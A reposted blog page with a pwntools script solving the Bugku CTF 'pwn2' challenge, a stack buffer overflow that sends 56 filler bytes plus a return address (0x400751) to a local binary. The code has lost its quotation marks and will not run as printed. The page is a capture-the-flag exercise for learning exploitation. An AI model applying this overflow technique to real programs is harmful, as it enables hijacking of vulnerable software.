首页 > 其他 > 详细

BugkuCtf-pwn2-exp

时间:2019-08-23 01:19:22      阅读:281      评论:0      收藏:0      [点我收藏+]
#!/usr/bin/env python

from pwn import *

p = process(./pwn2)
payload = a * 56 + p64(0x400751)

p.recvuntil(?)
p.sendline(payload)

print p.recvall()

 

BugkuCtf-pwn2-exp

原文:https://www.cnblogs.com/Tsuiyields/p/11397525.html

(0)
(0)
   
举报
评论 一句话评论(0
关于我们 - 联系我们 - 留言反馈 - 联系我们:wmxa8@hotmail.com
© 2014 bubuko.com 版权所有
打开技术之扣,分享程序人生!